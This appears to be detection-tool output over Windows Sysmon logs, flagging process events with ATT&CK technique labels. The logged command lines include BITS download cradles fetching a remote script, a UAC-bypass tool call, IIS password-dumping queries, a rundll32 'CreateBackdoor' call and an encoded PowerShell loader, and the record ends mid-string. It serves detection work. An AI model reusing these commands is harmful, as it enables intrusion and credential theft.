SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-268F-5CD8-0000-0010F4A51700 1256 C:\Python27\python.exe python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\System32\cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 16040 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-11 17:28:22.488 365ABB72-0636-5CD7-0000-0010A6C72100 544 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation c:\windows\System32\cmd.exe C:\Windows\system32\ IEWIN7\IEUser 365ABB72-F9CD-5CD6-0000-00201B370100 0x1371b 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-0545-5CD7-0000-001078371F00 3044 C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920560.43525,2019-05-27T05:29:20.435250+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:userName ),1," 1 5 4 1 0 0x8000000000000000 5988 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:20.375 365ABB72-3D70-5CEB-0000-001032EAFF00 1004 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:userName C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1197] BITS Jobs - Process,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1," 1 5 4 1 0 0x8000000000000000 4893 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:03.238 747F3D96-660F-5D3F-0000-001055378600 2948 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1," 1 5 4 1 0 0x8000000000000000 4893 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:03.238 747F3D96-660F-5D3F-0000-001055378600 2948 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920560.305063,2019-05-27T05:29:20.305063+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1," 1 5 4 1 0 0x8000000000000000 5985 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:20.265 365ABB72-3D70-5CEB-0000-001072E6FF00 2640 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564435983.254713,2019-07-30T01:33:03.254713+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt "C:\Windows\system32\Default_File_Path.ps1" ),1," 1 5 4 1 0 0x8000000000000000 4892 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:03.184 747F3D96-660F-5D3F-0000-00109B328600 6020 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt "C:\Windows\system32\Default_File_Path.ps1" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1553017268.977707,2019-03-19T21:41:08.977707+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1," 1 5 4 1 0 0x8000000000000000 1966184 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 17:41:08.947 365ABB72-29B4-5C91-0000-0010289AC308 3748 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\cmd.EXE /c malwr.vbs C:\Windows\system32\ EXAMPLE\user01 365ABB72-2209-5C91-0000-0020FA479E03 0x39e47fa 2 High MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-1A4A-5C91-0000-0010455A0000 512 C:\Windows\System32\services.exe C:\Windows\system32\services.exe ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243514 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.511 747F3D96-9F61-5E75-0000-0010736B1E00 8116 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c notepad.exe ),1," 1 5 4 1 0 0x8000000000000000 11126 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-09 02:08:00.336 365ABB72-8B80-5CD3-0000-001065512A00 2264 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\cmd.exe" /c notepad.exe C:\Windows\system32\ IEWIN7\IEUser 365ABB72-863B-5CD3-0000-00204A390100 0x1394a 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-8B77-5CD3-0000-0010E8FD2900 3836 C:\Windows\System32\sdclt.exe ? ",IEWIN7,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243514 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.511 747F3D96-9F61-5E75-0000-0010736B1E00 8116 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243514 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.511 747F3D96-9F61-5E75-0000-0010736B1E00 8116 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920560.204919,2019-05-27T05:29:20.204919+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1," 1 5 4 1 0 0x8000000000000000 5982 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:20.164 365ABB72-3D70-5CEB-0000-0010B2E2FF00 2108 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGU